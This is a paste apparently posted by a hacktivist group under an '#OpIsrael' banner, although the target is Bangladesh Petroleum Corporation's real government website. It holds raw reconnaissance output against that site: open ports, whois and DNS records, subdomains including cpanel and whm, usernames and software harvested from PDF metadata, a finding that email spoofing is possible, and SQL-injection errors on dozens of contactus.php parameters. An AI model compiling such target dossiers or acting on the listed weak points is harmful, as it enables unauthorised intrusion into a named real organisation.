Anonymous JTSEC #OpIsrael Full Recon #19

a guest
Nov 23rd, 2018
  1. ######################################################################################################################################
  2. Hostname www.bpc.gov.bd ISP TierPoint, LLC
  3. Continent North America Flag
  4. US
  5. Country United States Country Code US
  6. Region Unknown Local time 22 Nov 2018 11:03 CST
  7. City Unknown Postal Code Unknown
  8. IP Address 173.237.136.21 Latitude 37.751
  9. Longitude -97.822
  10.  
  11. #######################################################################################################################################
  12. > www.bpc.gov.bd
  13. Server: 194.187.251.67
  14. Address: 194.187.251.67#53
  15.  
  16. Non-authoritative answer:
  17. www.bpc.gov.bd canonical name = bpc.gov.bd.
  18. Name: bpc.gov.bd####
  19. Address: 173.237.136.21
  20. #######################################################################################################################################
  21. HostIP:173.237.136.21
  22. HostName:www.bpc.gov.bd
  23.  
  24. Gathered Inet-whois information for 173.237.136.21
  25. --------------------------------------------------------------------------------------------------------------------------------------
  26.  
  27.  
  28. inetnum: 173.234.136.0 - 173.244.143.255
  29. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  30. descr: IPv4 address block not managed by the RIPE NCC
  31. remarks: ------------------------------------------------------
  32. remarks:
  33. remarks: You can find the whois server to query, or the
  34. remarks: IANA registry to query on this web page:
  35. remarks: http://www.iana.org/assignments/ipv4-address-space
  36. remarks:
  37. remarks: You can access databases of other RIRs at:
  38. remarks:
  39. remarks: AFRINIC (Africa)
  40. remarks: http://www.afrinic.net/ whois.afrinic.net
  41. remarks:
  42. remarks: APNIC (Asia Pacific)
  43. remarks: http://www.apnic.net/ whois.apnic.net
  44. remarks:
  45. remarks: ARIN (Northern America)
  46. remarks: http://www.arin.net/ whois.arin.net
  47. remarks:
  48. remarks: LACNIC (Latin America and the Carribean)
  49. remarks: http://www.lacnic.net/ whois.lacnic.net
  50. remarks:
  51. remarks: IANA IPV4 Recovered Address Space
  52. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  53. remarks:
  54. remarks: ------------------------------------------------------
  55. country: EU # Country is really world wide
  56. admin-c: IANA1-RIPE
  57. tech-c: IANA1-RIPE
  58. status: ALLOCATED UNSPECIFIED
  59. mnt-by: RIPE-NCC-HM-MNT
  60. mnt-lower: RIPE-NCC-HM-MNT
  61. created: 2018-07-09T15:19:05Z
  62. last-modified: 2018-09-04T13:35:20Z
  63. source: RIPE
  64.  
  65. role: Internet Assigned Numbers Authority
  66. address: see http://www.iana.org.
  67. admin-c: IANA1-RIPE
  68. tech-c: IANA1-RIPE
  69. nic-hdl: IANA1-RIPE
  70. remarks: For more information on IANA services
  71. remarks: go to IANA web site at http://www.iana.org.
  72. mnt-by: RIPE-NCC-MNT
  73. created: 1970-01-01T00:00:00Z
  74. last-modified: 2001-09-22T09:31:27Z
  75. source: RIPE # Filtered
  76.  
  77. % This query was served by the RIPE Database Query Service version 1.92.6 (WAGYU)
  78.  
  79.  
  80.  
  81. Gathered Inic-whois information for bpc.gov.bd
  82. --------------------------------------------------------------------------------------------------------------------------------------
  83. Error: Unable to connect - Invalid Host
  84. ERROR: Connection to InicWhois Server bd.whois-servers.net failed
  85. close error
  86.  
  87. Gathered Netcraft information for www.bpc.gov.bd
  88. --------------------------------------------------------------------------------------------------------------------------------------
  89.  
  90. Retrieving Netcraft.com information for www.bpc.gov.bd
  91. Netcraft.com Information gathered
  92.  
  93. Gathered Subdomain information for bpc.gov.bd
  94. -------------------------------------------------------------------------------------------------------------------------------------
  95. Searching Google.com:80...
  96. HostName:www.bpc.gov.bd
  97. HostIP:173.237.136.21
  98. Searching Altavista.com:80...
  99. Found 1 possible subdomain(s) for host bpc.gov.bd, Searched 0 pages containing 0 results
  100.  
  101. Gathered E-Mail information for bpc.gov.bd
  102. -----------------------------------------------------------------------------------------------------------------------------------
  103. Searching Google.com:80...
  104. Searching Altavista.com:80...
  105. Found 0 E-Mail(s) for host bpc.gov.bd, Searched 0 pages containing 0 results
  106.  
  107. Gathered TCP Port information for 173.237.136.21
  108. --------------------------------------------------------------------------------------------------------------------------------------
  109.  
  110. Port State
  111.  
  112. 21/tcp open
  113. 22/tcp open
  114. 26/tcp open
  115. 53/tcp open
  116. 80/tcp open
  117. 110/tcp open
  118. 143/tcp open
  119.  
  120. Portscan Finished: Scanned 150 ports, 141 ports were in state closed
  121.  
  122. #######################################################################################################################################
  123. [i] Scanning Site: http://www.bpc.gov.bd
  124.  
  125.  
  126.  
  127. B A S I C I N F O
  128. =======================================================================================================================================
  129.  
  130.  
  131. [+] Site Title: Bangladesh Petroleum Corporation
  132. [+] IP address: 173.237.136.21
  133. [+] Web Server: Could Not Detect
  134. [+] CMS: Could Not Detect
  135. [+] Cloudflare: Not Detected
  136. [+] Robots File: Could NOT Find robots.txt!
  137.  
  138.  
  139.  
  140.  
  141.  
  142.  
  143. G E O I P L O O K U P
  144. =======================================================================================================================================
  145.  
  146. [i] IP Address: 173.237.136.21
  147. [i] Country: US
  148. [i] State: Missouri
  149. [i] City: Saint Louis
  150. [i] Latitude: 38.614300
  151. [i] Longitude: -90.444397
  152.  
  153.  
  154.  
  155.  
  156. H T T P H E A D E R S
  157. =======================================================================================================================================
  158.  
  159.  
  160. [i] HTTP/1.1 200 OK
  161. [i] Date: Thu, 22 Nov 2018 17:10:26 GMT
  162. [i] Content-Type: text/html; charset=UTF-8
  163. [i] Connection: close
  164.  
  165.  
  166.  
  167.  
  168. D N S L O O K U P
  169. =======================================================================================================================================
  170.  
  171. bpc.gov.bd. 21599 IN SOA ns1.speedydns.net. root.uscentral22.myserverhosts.com. 2018070501 86400 7200 3600000 86400
  172. bpc.gov.bd. 21599 IN A 173.237.136.21
  173. bpc.gov.bd. 21599 IN MX 0 bpc.gov.bd.
  174. bpc.gov.bd. 21599 IN NS ns1.speedydns.net.
  175. bpc.gov.bd. 21599 IN NS ns2.speedydns.net.
  176.  
  177.  
  178.  
  179.  
  180. S U B N E T C A L C U L A T I O N
  181. ======================================================================================================================================
  182.  
  183. Address = 173.237.136.21
  184. Network = 173.237.136.21 / 32
  185. Netmask = 255.255.255.255
  186. Broadcast = not needed on Point-to-Point links
  187. Wildcard Mask = 0.0.0.0
  188. Hosts Bits = 0
  189. Max. Hosts = 1 (2^0 - 0)
  190. Host Range = { 173.237.136.21 - 173.237.136.21 }
  191.  
  192.  
  193.  
  194. N M A P P O R T S C A N
  195. ======================================================================================================================================
  196.  
  197.  
  198. Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-22 17:10 UTC
  199. Nmap scan report for bpc.gov.bd (173.237.136.21)
  200. Host is up (0.038s latency).
  201. rDNS record for 173.237.136.21: uscentral22.myserverhosts.com
  202. PORT STATE SERVICE
  203. 21/tcp open ftp
  204. 22/tcp open ssh
  205. 23/tcp filtered telnet
  206. 80/tcp open http
  207. 110/tcp open pop3
  208. 143/tcp open imap
  209. 443/tcp open https
  210. 3389/tcp closed ms-wbt-server
  211.  
  212. Nmap done: 1 IP address (1 host up) scanned in 2.95 seconds
  213.  
  214.  
  215.  
  216.  
  217.  
  218.  
  219. S Q L V U L N E R A B I L I T Y S C A N N E R
  220. =======================================================================================================================================
  221.  
  222. [#] contactus.php?id=32
  223. [-] Searching For SQL Errors: Found!
  224.  
  225.  
  226. [#] contactus.php?id=1
  227. [-] Searching For SQL Errors: Found!
  228.  
  229.  
  230. [#] contactus.php?id=3
  231. [-] Searching For SQL Errors: Found!
  232.  
  233.  
  234. [#] contactus.php?id=5
  235. [-] Searching For SQL Errors: Found!
  236.  
  237.  
  238. [#] contactus.php?id=6
  239. [-] Searching For SQL Errors: Found!
  240.  
  241.  
  242. [#] contactus.php?id=7
  243. [-] Searching For SQL Errors: Found!
  244.  
  245.  
  246. [#] contactus.php?id=8
  247. [-] Searching For SQL Errors: Found!
  248.  
  249.  
  250. [#] contactus.php?id=14
  251. [-] Searching For SQL Errors: Found!
  252.  
  253.  
  254. [#] contactus.php?id=23
  255. [-] Searching For SQL Errors: Found!
  256.  
  257.  
  258. [#] contactus.php?id=32
  259. [-] Searching For SQL Errors: Found!
  260.  
  261.  
  262. [#] contactus.php?id=40
  263. [-] Searching For SQL Errors: Found!
  264.  
  265.  
  266. [#] contactus.php?id=4
  267. [-] Searching For SQL Errors: Found!
  268.  
  269.  
  270. [#] contactus.php?id=35
  271. [-] Searching For SQL Errors: Found!
  272.  
  273.  
  274. [#] contactus.php?id=17
  275. [-] Searching For SQL Errors: Found!
  276.  
  277.  
  278. [#] contactus.php?id=18
  279. [-] Searching For SQL Errors: Found!
  280.  
  281.  
  282. [#] contactus.php?id=19
  283. [-] Searching For SQL Errors: Found!
  284.  
  285.  
  286. [#] contactus.php?id=20
  287. [-] Searching For SQL Errors: Found!
  288.  
  289.  
  290. [#] contactus.php?id=21
  291. [-] Searching For SQL Errors: Found!
  292.  
  293.  
  294. [#] contactus.php?id=36
  295. [-] Searching For SQL Errors: Found!
  296.  
  297.  
  298. [#] contactus.php?id=37
  299. [-] Searching For SQL Errors: Found!
  300.  
  301.  
  302. [#] contactus.php?id=52
  303. [-] Searching For SQL Errors: Found!
  304.  
  305.  
  306. [#] contactus.php?id=45
  307. [-] Searching For SQL Errors: Found!
  308.  
  309.  
  310. [#] contactus.php?id=46
  311. [-] Searching For SQL Errors: Found!
  312.  
  313.  
  314. [#] contactus.php?id=47
  315. [-] Searching For SQL Errors: Found!
  316.  
  317.  
  318. [#] contactus.php?id=48
  319. [-] Searching For SQL Errors: Found!
  320.  
  321.  
  322. [#] contactus.php?id=49
  323. [-] Searching For SQL Errors: Found!
  324.  
  325.  
  326. [#] contactus.php?id=2
  327. [-] Searching For SQL Errors: Found!
  328.  
  329.  
  330. [#] contactus.php?id=12
  331. [-] Searching For SQL Errors: Found!
  332.  
  333.  
  334. [#] contactus.php?id=22
  335. [-] Searching For SQL Errors: Found!
  336.  
  337.  
  338. [#] contactus.php?id=27
  339. [-] Searching For SQL Errors: Found!
  340.  
  341.  
  342. [#] contactus.php?id=28
  343. [-] Searching For SQL Errors: Found!
  344.  
  345.  
  346. [#] contactus.php?id=29
  347. [-] Searching For SQL Errors: Found!
  348.  
  349.  
  350. [#] contactus.php?id=39
  351. [-] Searching For SQL Errors: Found!
  352.  
  353.  
  354. [#] contactus.php?id=41
  355. [-] Searching For SQL Errors: Found!
  356.  
  357.  
  358. [#] contactus.php?id=13
  359. [-] Searching For SQL Errors: Found!
  360.  
  361.  
  362. [#] contactus.php?id=26
  363. [-] Searching For SQL Errors: Found!
  364.  
  365.  
  366. [#] contactus.php?id=18
  367. [-] Searching For SQL Errors: Found!
  368.  
  369.  
  370. [#] contactus.php?id=36
  371. [-] Searching For SQL Errors: Found!
  372.  
  373.  
  374. [#] contactus.php?id=37
  375. [-] Searching For SQL Errors: Found!
  376. #######################################################################################################################################
  377. [?] Enter the target: http://www.bpc.gov.bd/
  378. [!] IP Address : 173.237.136.21
  379. [!] www.bpc.gov.bd doesn't seem to use a CMS
  380. [+] Honeypot Probabilty: 30%
  381. ---------------------------------------------------------------------------------------------------------------------------------------
  382. [~] Trying to gather whois information for www.bpc.gov.bd
  383. [+] Whois information found
  384. [-] Unable to build response, visit https://who.is/whois/www.bpc.gov.bd
  385. -------------------------------------------------------------------------------------------------------------------------------------
  386. PORT STATE SERVICE
  387. 21/tcp open ftp
  388. 22/tcp open ssh
  389. 23/tcp filtered telnet
  390. 80/tcp open http
  391. 110/tcp open pop3
  392. 143/tcp open imap
  393. 443/tcp open https
  394. 3389/tcp closed ms-wbt-server
  395. Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
  396. --------------------------------------------------------------------------------------------------------------------------------------
  397.  
  398. [+] DNS Records
  399. ns1.speedydns.net. (174.37.183.108) AS36351 SoftLayer Technologies Inc. United States
  400. ns2.speedydns.net. (50.22.35.226) AS36351 SoftLayer Technologies Inc. United States
  401.  
  402. [+] MX Records
  403. 0 (173.237.136.21) AS36024 Colo4, LLC United States
  404.  
  405. [+] Host Records (A)
  406. www.bpc.gov.bdHTTP: (uscentral22.myserverhosts.com) (173.237.136.21) AS36024 Colo4, LLC United States
  407.  
  408. [+] TXT Records
  409.  
  410. [+] DNS Map: https://dnsdumpster.com/static/map/bpc.gov.bd.png
  411.  
  412. [>] Initiating 3 intel modules
  413. [>] Loading Alpha module (1/3)
  414. [>] Beta module deployed (2/3)
  415. [>] Gamma module initiated (3/3)
  416.  
  417.  
  418. [+] Emails found:
  419. -------------------------------------------------------------------------------------------------------------------------------------
  420. pixel-1542906651361929-web-@www.bpc.gov.bd
  421. pixel-1542906653819235-web-@www.bpc.gov.bd
  422. No hosts found
  423. [+] Virtual hosts:
  424. --------------------------------------------------------------------------------------------------------------------------------------
  425. [~] Crawling the target for fuzzable URLs
  426. [+] Found 39 fuzzable URLs
  427. http://www.bpc.gov.bd//contactus.php?id=32
  428. [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
  429. #######################################################################################################################################
  430. [+] Hosting Info for Website: www.bpc.gov.bd
  431. [+] Visitors per day: 2,360
  432. [+] IP Address: 173.237.136.21
  433. [+] IP Reverse DNS (Host): uscentral22.myserverhosts.com
  434. [+] Hosting IP Range: 173.237.128.0 - 173.237.191.255 (16,384 ip)
  435. [+] Hosting Address: 12444 Powerscourt Drive Suite 450, St. Louis, MO, 63131, US
  436. [+] Hosting Country: USA
  437. [+] Hosting Phone: +1-484-893-1507, +1-609-220-0322, +1-610-994-3046
  438. [+] Hosting Website: api.jumis.com
  439. [+] CIDR: 173.237.128.0/18
  440. [+] Hosting CIDR: 173.237.128.0/18
  441.  
  442. [+] NS: bpc.gov.bd
  443. [+] NS: ns2.speedydns.net
  444. [+] NS: ns1.speedydns.net
  445. ######################################################################################################################################
  446. ; <<>> DiG 9.11.5-1-Debian <<>> bpc.gov.bd
  447. ;; global options: +cmd
  448. ;; Got answer:
  449. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36802
  450. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  451.  
  452. ;; OPT PSEUDOSECTION:
  453. ; EDNS: version: 0, flags:; udp: 4096
  454. ;; QUESTION SECTION:
  455. ;bpc.gov.bd. IN A
  456.  
  457. ;; ANSWER SECTION:
  458. bpc.gov.bd. 84833 IN A 173.237.136.21
  459.  
  460. ;; Query time: 120 msec
  461. ;; SERVER: 194.187.251.67#53(194.187.251.67)
  462. ;; WHEN: jeu nov 22 12:29:33 EST 2018
  463. ;; MSG SIZE rcvd: 55
  464.  
  465. #####################################################################################################################################
  466. ; <<>> DiG 9.11.5-1-Debian <<>> +trace bpc.gov.bd
  467. ;; global options: +cmd
  468. . 86160 IN NS h.root-servers.net.
  469. . 86160 IN NS c.root-servers.net.
  470. . 86160 IN NS l.root-servers.net.
  471. . 86160 IN NS g.root-servers.net.
  472. . 86160 IN NS m.root-servers.net.
  473. . 86160 IN NS b.root-servers.net.
  474. . 86160 IN NS e.root-servers.net.
  475. . 86160 IN NS i.root-servers.net.
  476. . 86160 IN NS k.root-servers.net.
  477. . 86160 IN NS a.root-servers.net.
  478. . 86160 IN NS d.root-servers.net.
  479. . 86160 IN NS f.root-servers.net.
  480. . 86160 IN NS j.root-servers.net.
  481. . 86160 IN RRSIG NS 8 0 518400 20181205050000 20181122040000 2134 . GbKyyBgbCU9fsYw/7uunYdGXnGc/GkWD7cWhP2+DSip0Tz3Vy+JJ79NZ ml0SGP0/S4GlCXVm11FpcXQOPTpoJZdtJqb/403hlOwB5q9CEooFek5d cWhmFYrkAML8E48uU1+ji72NRCdzs9saOPGk/FRlc4dTQwVNI97qqJMT GnHK9wqugnfiV4jFnAX/UmikW1tOdRyeTaqB5voY1Tku7x8XvLsu/5VL 4SOobgjvdbaLTgJqZTjLq0Q1fNMztDU3cr3I1NNWkcKSUOiAJ8tThR4s almON2rxSXGYyhwlbLezIsBj3RDEfYuc6V2TRRuSbv/fGE75rZBFYyc4 wZWwyw==
  482. ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 120 ms
  483.  
  484. bd. 172800 IN NS jamuna.btcl.net.bd.
  485. bd. 172800 IN NS dns.bd.
  486. bd. 172800 IN NS surma.btcl.net.bd.
  487. bd. 172800 IN NS bd-ns.anycast.pch.net.
  488. bd. 86400 IN NSEC be. NS RRSIG NSEC
  489. bd. 86400 IN RRSIG NSEC 8 1 86400 20181205050000 20181122040000 2134 . Cee16WQpXm9zmIh4pKmOHxD7UY+0gLgYXlQx87XivrpYpTRMb3xaKc8A 98iY4jtO5j30dyLZkpR8loCWgw6un4F8MhfZLloTARKxc+EU19tUcEWO N/qgTta/lsOjDPG12VQByhlKXsPaKWDfK6zUMQbiEr+ivZxhp/gv98vJ z+F5z9+WIm6ss9x45a6XDOj9eIndlyNSkiBUcII3YsK65do3dLw1oW4v WvrkOBD5cRcyUSOUm1JNSdAdrAfCCv6A4Ovd8D151QfEzrieGXyaNHJT zM5lGpqnaV6S1xaqwv/rW8n+RJCyBb1MAxjqh9btPjRPZt+bHBjuR6mG naBlrA==
  490. ;; Received 657 bytes from 199.9.14.201#53(b.root-servers.net) in 280 ms
  491.  
  492. bpc.gov.bd. 86400 IN NS ns2.speedydns.net.
  493. bpc.gov.bd. 86400 IN NS ns1.speedydns.net.
  494. ;; Received 88 bytes from 204.61.216.108#53(bd-ns.anycast.pch.net) in 117 ms
  495.  
  496. ;; expected opt record in response
  497. bpc.gov.bd. 86400 IN A 173.237.136.21
  498. bpc.gov.bd. 86400 IN NS ns1.speedydns.net.
  499. bpc.gov.bd. 86400 IN NS ns2.speedydns.net.
  500. ;; Received 125 bytes from 174.37.183.108#53(ns1.speedydns.net) in 247 ms
  501.  
  502. ######################################################################################################################################
  503. [*] Performing General Enumeration of Domain: bpc.gov.bd
  504. [-] DNSSEC is not configured for bpc.gov.bd
  505. [*] SOA ns1.speedydns.net 174.37.183.108
  506. [*] NS ns2.speedydns.net 50.22.35.226
  507. [*] NS ns1.speedydns.net 174.37.183.108
  508. [*] MX bpc.gov.bd 173.237.136.21
  509. [*] A bpc.gov.bd 173.237.136.21
  510. [*] Enumerating SRV Records
  511. [-] No SRV Records Found for bpc.gov.bd
  512. [+] 0 Records Found
  513. ######################################################################################################################################
  514. [*] Processing domain bpc.gov.bd
  515. [+] Getting nameservers
  516. 50.22.35.226 - ns2.speedydns.net
  517. 174.37.183.108 - ns1.speedydns.net
  518. [-] Zone transfer failed
  519.  
  520. [+] MX records found, added to target list
  521. 0 bpc.gov.bd.
  522.  
  523. [*] Scanning bpc.gov.bd for A records
  524. 173.237.136.21 - bpc.gov.bd
  525. 173.237.136.21 - autodiscover.bpc.gov.bd
  526. 173.237.136.21 - autoconfig.bpc.gov.bd
  527. 173.237.136.21 - cpanel.bpc.gov.bd
  528. 173.237.136.21 - ftp.bpc.gov.bd
  529. 127.0.0.1 - localhost.bpc.gov.bd
  530. 173.237.136.21 - mail.bpc.gov.bd
  531. 173.237.136.21 - webdisk.bpc.gov.bd
  532. 173.237.136.21 - webmail.bpc.gov.bd
  533. 173.237.136.21 - whm.bpc.gov.bd
  534. 173.237.136.21 - www.bpc.gov.bd
  535. #######################################################################################################################################
  536. Ip Address Status Type Domain Name Server
  537. ---------- ------ ---- ----------- ------
  538. 173.237.136.21 200 host ftp.bpc.gov.bd
  539. 127.0.0.1 host localhost.bpc.gov.bd
  540. 173.237.136.21 200 alias mail.bpc.gov.bd
  541. 173.237.136.21 200 host bpc.gov.bd
  542. 173.237.136.21 301 host webmail.bpc.gov.bd
  543. 173.237.136.21 200 alias www.bpc.gov.bd
  544. 173.237.136.21 200 host bpc.gov.bd
  545. ######################################################################################################################################
  546. [+] Testing domain
  547. www.bpc.gov.bd 173.237.136.21
  548. [+] Dns resolving
  549. Domain name Ip address Name server
  550. bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
  551. Found 1 host(s) for bpc.gov.bd
  552. [+] Testing wildcard
  553. Ok, no wildcard found.
  554.  
  555. [+] Scanning for subdomain on bpc.gov.bd
  556. [!] Wordlist not specified. I scannig with my internal wordlist...
  557. Estimated time about 127.6 seconds
  558.  
  559. Subdomain Ip address Name server
  560.  
  561. ftp.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
  562. localhost.bpc.gov.bd 127.0.0.1 localhost
  563. mail.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
  564. webmail.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
  565. www.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
  566. #######################################################################################################################################
  567. Start: 2018-11-22T17:28:48+0000
  568. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
  569. 1.|-- 45.79.12.202 0.0% 3 1.1 0.8 0.7 1.1 0.2
  570. 2.|-- 45.79.12.6 0.0% 3 1.0 3.6 0.7 9.2 4.8
  571. 3.|-- dls-b22-link.telia.net 0.0% 3 0.9 1.0 0.9 1.3 0.2
  572. 4.|-- dls-b21-link.telia.net 0.0% 3 1.4 3.4 1.4 6.3 2.6
  573. 5.|-- tierpoint-ic-310923-dls-b21.c.telia.net 0.0% 3 1.4 5.8 1.4 14.4 7.4
  574. 6.|-- 207.210.229.6 0.0% 3 1.7 1.7 1.7 1.8 0.0
  575. 7.|-- 174.136.31.218 0.0% 3 1.3 1.4 1.3 1.4 0.1
  576. 8.|-- uscentral22.myserverhosts.com 0.0% 3 1.4 1.6 1.4 1.8 0.2
  577. #######################################################################################################################################
  578. ---------------------------------------------------------------------------------------------------------------------------------------
  579. + Target IP: 173.237.136.21
  580. + Target Hostname: www.bpc.gov.bd
  581. + Target Port: 80
  582. + Start Time: 2018-11-22 12:08:57 (GMT-5)
  583. ---------------------------------------------------------------------------------------------------------------------------------------
  584. + Server: No banner retrieved
  585. + The anti-clickjacking X-Frame-Options header is not present.
  586. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  587. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  588. + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
  589. + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
  590. + Scan terminated: 13 error(s) and 4 item(s) reported on remote host
  591. + End Time: 2018-11-22 13:05:53 (GMT-5) (3416 seconds)
  592. ---------------------------------------------------------------------------------------------------------------------------------------
  593. ######################################################################################################################################
  594.  
  595. dnsenum VERSION:1.2.4
  596.  
  597. ----- www.bpc.gov.bd -----
  598.  
  599.  
  600. Host's addresses:
  601. __________________
  602.  
  603. bpc.gov.bd. 86400 IN A 173.237.136.21
  604.  
  605.  
  606. Name Servers:
  607. ______________
  608.  
  609. ns2.speedydns.net. 86081 IN A 50.22.35.226
  610. ns1.speedydns.net. 86065 IN A 174.37.183.108
  611.  
  612.  
  613. Mail (MX) Servers:
  614. ___________________
  615.  
  616. bpc.gov.bd. 86400 IN A 173.237.136.21
  617.  
  618.  
  619. Trying Zone Transfers and getting Bind Versions:
  620. _________________________________________________
  621.  
  622.  
  623. Trying Zone Transfer for www.bpc.gov.bd on ns2.speedydns.net ...
  624.  
  625. Trying Zone Transfer for www.bpc.gov.bd on ns1.speedydns.net ...
  626.  
  627. brute force file not specified, bay.
  628. #######################################################################################################################################
  629. ---------------------------------------------------------------------------------------------------------------------------------------
  630.  
  631. [1/25] /webhp?hl=en-FR
  632. [x] Error downloading /webhp?hl=en-FR
  633. [2/25] http://www.bpc.gov.bd/admin/current_vacancies/b684c889e14c1df86dd830a9fd904cdd.pdf
  634. [x] Error in PDF metadata Creator
  635. [3/25] http://www.bpc.gov.bd/admin/notice/12fd8e6bc2cf87cca46f19a3e7b9a611.pdf
  636. [x] Error in the parsing process
  637. [4/25] http://www.bpc.gov.bd/admin/news/c1b73506b57f8ebf2928f704827dd5c1.pdf
  638. [5/25] http://www.bpc.gov.bd/admin/news/0f0d9138a5e0898c496fa98006f712d6.pdf
  639. [6/25] http://www.bpc.gov.bd/admin/news/685281be8984823884192e42eea1d05b.pdf
  640. [7/25] http://www.bpc.gov.bd/admin/news/f952301b036b57834b7ee3a2de020472.pdf
  641. [8/25] http://www.bpc.gov.bd/admin/annual_report/5878e46e61726e85a43b91e477ebeadf.pdf
  642. [x] Error in PDF metadata Creator
  643. [9/25] http://www.bpc.gov.bd/admin/annual_report/50f12271ac13cec7515303ea83553f03.pdf
  644. [x] Error in PDF metadata Creator
  645. [10/25] http://www.bpc.gov.bd/admin/annual_report/a70881d948e78e700e8581525b36c72e.pdf
  646. [x] Error in PDF metadata Creator
  647. [11/25] http://www.bpc.gov.bd/admin/notice/4eabe0863aa66c8b75c50512ce82e19f.pdf
  648. [x] Error in PDF metadata Creator
  649. [12/25] http://www.bpc.gov.bd/admin/news/d455f1c285096b6258557e06533c075c.pdf
  650. [13/25] https://www.bpc.gov.bd/admin/annual_performance_agreement/5ee366afaf58b1fefc13bb66c661f311.pdf
  651. [x] Error downloading https://www.bpc.gov.bd/admin/annual_performance_agreement/5ee366afaf58b1fefc13bb66c661f311.pdf
  652. [14/25] http://www.bpc.gov.bd/admin/notice/dc7b13b25ad04c58c5f8c9ee7b636ce2.pdf
  653. [x] Error in the parsing process
  654. [15/25] http://www.bpc.gov.bd/admin/annual_performance_agreement/890199e67b62b98b41ec178498f3fc50.pdf
  655. [x] Error in PDF metadata Creator
  656. [16/25] http://www.bpc.gov.bd/admin/notice/1e0e387a348b442c5b7526aabdd7ce81.pdf
  657. [x] Error in the parsing process
  658. [17/25] http://www.bpc.gov.bd/admin/notice/dbef95d4ba79e5a67d69995e72d5a3ff.pdf
  659. [x] Error in the parsing process
  660. [18/25] http://www.bpc.gov.bd/admin/news/b7807166e10bff066ade14a348b34eb8.pdf
  661. [19/25] http://www.bpc.gov.bd/admin/notice/28ee5a0e6338c34c25fcd818bec1895b.pdf
  662. [x] Error in the parsing process
  663. [20/25] http://www.bpc.gov.bd/admin/news/8d3e9ece7700392e11a588c85d14fd46.pdf
  664. [21/25] http://www.bpc.gov.bd/admin/notice/553a692d84b865b3f8d6c87a7579dc8f.pdf
  665. [x] Error in the parsing process
  666. [22/25] http://www.bpc.gov.bd/admin/notice/383e04897c6786078e0d34677956f3e0.pdf
  667. [x] Error in the parsing process
  668. [23/25] http://www.bpc.gov.bd/admin/vacancy/7cff6f9ef50bc77b13a761d6c642c5ba.pdf
  669. [24/25] http://www.bpc.gov.bd/admin/annual_performance_agreement/f05a92ce7e1091227bd945ff36175103.pdf
  670. [x] Error in PDF metadata Creator
  671. [25/25] http://www.bpc.gov.bd/admin/current_vacancies/99abe678b4ebe6abddbdb7f9fb75fe4a.pdf
  672. ######################################################################################################################################
  673. [+] List of users found:
  674. ---------------------------------------------------------------------------------------------------------------------------------------
  675.  
  676. USER
  677. DELL
  678.  
  679. [+] List of software found:
  680. -----------------------------
  681.  
  682. GPL Ghostscript 9.14
  683. PDF24 Creator
  684. IJ Scan Utility
  685. Canon SC1011
  686. Adobe PDF Library 5.0.5
  687. HP PDF Formatter version 7.0.0.175
  688. DPE Build 5656
  689. GPL Ghostscript 9.22
  690. PDF Splitter and Merger (http://www.pdfarea.com)
  691.  
  692. [+] List of e-mails found:
  693. ----------------------------
  694. cl@Ifr
  695. f@a
  696. rqtfterstg@sqm
  697. .r@r
  698. ######################################################################################################################################
  699.  
  700.  
  701. Running Source: Ask
  702. Running Source: Archive.is
  703. Running Source: Baidu
  704. Running Source: Bing
  705. Running Source: CertDB
  706. Running Source: CertificateTransparency
  707. Running Source: Certspotter
  708. Running Source: Commoncrawl
  709. Running Source: Crt.sh
  710. Running Source: Dnsdb
  711. Running Source: DNSDumpster
  712. Running Source: DNSTable
  713. Running Source: Dogpile
  714. Running Source: Exalead
  715. Running Source: Findsubdomains
  716. Running Source: Googleter
  717. Running Source: Hackertarget
  718. Running Source: Ipv4Info
  719. Running Source: PTRArchive
  720. Running Source: Sitedossier
  721. Running Source: Threatcrowd
  722. Running Source: ThreatMiner
  723. Running Source: WaybackArchive
  724. Running Source: Yahoo
  725.  
  726. Running enumeration on www.bpc.gov.bd
  727.  
  728. dnsdb: Unexpected return status 503
  729.  
  730. waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.www.bpc.gov.bd/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.www.bpc.gov.bd/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer
  731.  
  732.  
  733. Starting Bruteforcing of www.bpc.gov.bd with 9985 words
  734.  
  735. Total 1 Unique subdomains found for www.bpc.gov.bd
  736.  
  737. .www.bpc.gov.bd
  738. #######################################################################################################################################
  739. [+] www.bpc.gov.bd has no SPF record!
  740. [*] No DMARC record found. Looking for organizational record
  741. [+] No organizational DMARC record
  742. [+] Spoofing possible for www.bpc.gov.bd!
  743. #######################################################################################################################################
  744. __
  745. ____ _____ ___ ______ _/ /_____ ____ ___
  746. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  747. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  748. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  749. /_/ discover v0.5.0 - by @michenriksen
  750.  
  751. Identifying nameservers for www.bpc.gov.bd... Done
  752. Using nameservers:
  753.  
  754. - 50.22.35.226
  755. - 174.37.183.108
  756.  
  757. Checking for wildcard DNS... Done
  758.  
  759. Running collector: Threat Crowd... Done (0 hosts)
  760. Running collector: DNSDB... Error
  761. -> DNSDB returned unexpected response code: 503
  762. Running collector: Netcraft... Done (0 hosts)
  763. Running collector: PublicWWW... Done (0 hosts)
  764. Running collector: Censys... Skipped
